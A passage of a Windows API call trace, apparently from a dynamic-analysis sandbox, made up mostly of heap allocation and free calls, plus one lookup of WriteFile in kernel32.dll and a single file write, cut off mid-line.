[0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.792] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0037.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0037.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0037.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0037.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0037.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0037.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0037.793] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0037.793] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0037.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0037.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af588 [0037.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0037.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0037.793] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af4a8 [0037.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0037.793] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac2f0 | out: hHeap=0x770000) returned 1 [0037.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0037.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3f8 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.794] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af378 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889610 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.794] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0037.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.795] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0037.795] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.795] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0037.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0037.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0037.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.796] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0037.796] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0037.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0037.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0037.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.797] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.797] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.797] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0037.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.798] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.798] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.799] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0037.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88cef8 [0037.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88cef8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0037.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.799] GetProcAddress (hModule=0x76e10000, lpProcName="WriteFile") returned 0x76e21282 [0037.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0037.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0037.799] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0037.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.799] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.800] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0037.800] WriteFile (in: hFile=0x140, lpBuffer=0xaa0008*, nNumberOfBytesToWrite=0x152c0, lpNumberOfBytesWritten=0x6ae4e0, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesWritten=0x6ae4e0*=0x152c0, lpOverlapped=0x0) returned 1 [0037.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0037.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.800] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 